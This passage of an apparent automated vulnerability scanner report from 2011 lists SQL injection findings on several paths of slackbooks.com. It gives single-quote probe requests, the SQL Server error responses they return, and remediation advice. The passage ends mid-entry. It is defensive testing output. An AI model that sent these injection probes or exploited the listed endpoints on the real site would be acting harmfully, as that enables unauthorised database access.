The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /Athletic+Training' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:56:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10059
<html> <head> <title>Unclosed quotation mark before the character string 'athletic+training''.<br>Line 1: Incorrect syntax near 'athletic+training''.</title> <style> b ...[SNIP]...
Request 2
GET /Athletic+Training'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:56:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12000
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /Manual+Therapy' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:59:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10029
<html> <head> <title>Unclosed quotation mark before the character string 'manual+therapy''.<br>Line 1: Incorrect syntax near 'manual+therapy''.</title> <style> body {f ...[SNIP]...
Request 2
GET /Manual+Therapy'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:59:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11990
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /Orthotics+and+Prosthetics' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 17:00:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10139
<html> <head> <title>Unclosed quotation mark before the character string 'orthotics+and+prosthetics''.<br>Line 1: Incorrect syntax near 'orthotics+and+prosthetics''.</title> <st ...[SNIP]...
Request 2
GET /Orthotics+and+Prosthetics'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 17:00:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /Physical+Therapy' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 17:02:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10049
<html> <head> <title>Unclosed quotation mark before the character string 'physical+therapy''.<br>Line 1: Incorrect syntax near 'physical+therapy''.</title> <style> bod ...[SNIP]...
Request 2
GET /Physical+Therapy'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 17:02:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /aclreconstuct' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:56:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10019
<html> <head> <title>Unclosed quotation mark before the character string 'aclreconstuct''.<br>Line 1: Incorrect syntax near 'aclreconstuct''.</title> <style> body {fon ...[SNIP]...
Request 2
GET /aclreconstuct'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:56:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11988
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Slackbooks.com -->
<html xmlns="http://www.w3.org/ ...[SNIP]...
1.52. http://www.slackbooks.com/aclreconstuct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slackbooks.com
Path:
/aclreconstuct
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /aclreconstuct?1'=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:56:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9884
<html> <head> <title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title> <style> body {font-family:"Verdana";font-wei ...[SNIP]...
Request 2
GET /aclreconstuct?1''=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:56:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12002
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ccacl' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:57:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9939
<html> <head> <title>Unclosed quotation mark before the character string 'ccacl''.<br>Line 1: Incorrect syntax near 'ccacl''.</title> <style> body {font-family:"Verdan ...[SNIP]...
Request 2
GET /ccacl'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:57:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11960
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Slackbooks.com -->
<html xmlns="http://www.w3.org/ ...[SNIP]...
1.54. http://www.slackbooks.com/ccacl [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slackbooks.com
Path:
/ccacl
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ccacl?1'=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:57:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9884
<html> <head> <title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title> <style> body {font-family:"Verdana";font-wei ...[SNIP]...
Request 2
GET /ccacl?1''=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:57:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ccknee' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:57:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9949
<html> <head> <title>Unclosed quotation mark before the character string 'ccknee''.<br>Line 1: Incorrect syntax near 'ccknee''.</title> <style> body {font-family:"Verd ...[SNIP]...
Request 2
GET /ccknee'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:57:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11962
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Slackbooks.com -->
<html xmlns="http://www.w3.org/ ...[SNIP]...
1.56. http://www.slackbooks.com/ccknee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slackbooks.com
Path:
/ccknee
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ccknee?1'=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:57:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9884
<html> <head> <title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title> <style> body {font-family:"Verdana";font-wei ...[SNIP]...
Request 2
GET /ccknee?1''=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:57:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /clinical+nursing+resources' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:57:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10149
<html> <head> <title>Unclosed quotation mark before the character string 'clinical+nursing+resources''.<br>Line 1: Incorrect syntax near 'clinical+nursing+resources''.</title> < ...[SNIP]...
Request 2
GET /clinical+nursing+resources'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:57:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12030
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /essentialknee' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sat, 05 Feb 2011 22:09:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10019
<html> <head> <title>Unclosed quotation mark before the character string 'essentialknee''.<br>Line 1: Incorrect syntax near 'essentialknee''.</title> <style> body {fon ...[SNIP]...
Request 2
GET /essentialknee'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sat, 05 Feb 2011 22:09:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=xekihsnsspcr3pi5wrb1km45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11988
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Slackbooks.com -->
<html xmlns="http://www.w3.org/ ...[SNIP]...
1.59. http://www.slackbooks.com/essentialknee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slackbooks.com
Path:
/essentialknee
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /essentialknee?1'=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sat, 05 Feb 2011 22:09:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9884
<html> <head> <title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title> <style> body {font-family:"Verdana";font-wei ...[SNIP]...
Request 2
GET /essentialknee?1''=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sat, 05 Feb 2011 22:09:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=q1glzym555hwgv3nndsy4d55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12002
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
